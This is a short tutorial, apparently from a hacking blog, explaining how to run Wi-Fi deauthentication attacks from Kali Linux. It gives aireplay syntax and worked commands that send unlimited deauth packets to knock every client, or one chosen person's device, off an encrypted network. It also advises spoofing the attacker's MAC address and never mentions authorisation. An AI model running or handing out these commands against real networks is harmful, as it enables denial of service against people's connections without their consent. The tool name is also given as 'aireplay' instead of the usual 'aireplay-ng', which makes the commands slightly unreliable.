
Disconnects any client from any network.
- Works on encrypted networks (WEP, WPA, WPA2)
- No need to know the network key/password/passphrase.
- No need to connect to the network.
You can find a detailed explanation for Deauth Attacks form here Concept of De-authentication Attack.
Requirements:
- Need Kali Linux installed as a host or as a virtual machine. We generally use Kali Linux as a Virtual Machine. Check this link for how to Install Kali Linux in Virtual Machine.
- Get the MAC Address/BSSID for the router/access point. Check the section How to scan nearby wireless networks of the post Wireless Network Sniffing.
- If want to attack a person get the MAC Address/BSSID of the target. Check the section How to scan a specific network of the post Wireless Network Sniffing to get the MAC of a particular person.
- Wireless Adapter which supports Monitor Mode.We are using ALPHA AWUS036NHA which has an Atheros AR9271 chipset.
- Your wireless adapter should be in Monitor Mode. Check this link for how to Enable Monitor Mode for Wireless Adapter.
- It’s good practice to change your MAC Address before scanning. Check this link for how to Change MAC Address in Kali Linux.
Deauth Attacks
How to deauth everyone from a network
In terminal, type:
- Syntax:
aireplay –deauth <no._of_packets> -a <AP_MAC> <adapter_name>
- –deauth: to tell it’s a de-authentication attack. Instead of –deauth you can type -0.
- <no._of_packets>: specifies how many numbers of packets you want to send for deauth. 0 (Zero) means infinite or send packet continuously.
- -a: is an option where you need to specify Target’s router MAC Address.
- <adpater_name>: type the adapter which is in monitor mode.
- Example:
aireplay --deauth 0 -a e2:33:44:55:66:77 wlan0
- Sending infinite packets to the router’s mac address (e2:33:44:55:66:77) using the wireless adapter (wlan0) which is in monitor mode.
How to deauth specific device from a network
In terminal, type:
- Syntax:
aireplay -0 <no._of_packets> -a <AP_MAC> -c <target’s_mac> <adapter_name>
- -0: is the short version of writing –deauth.
- -c: is option where you need to specify Target’s Device’s MAC Address.
- Example:
aireplay -0 0 -a e2:33:44:55:66:77 -c e2:22:33:44:55:66 wlan0
- Sending infinite packets to Target’s Device (e2:22:33:44:55:66) which is connected to the router (e2:33:44:55:66:77) using the wireless adapter (wlan0) which is in monitor mode.
Video Tutorial
Reference: https://www.hackhunt.in/2020/11/de-authentication-attack.html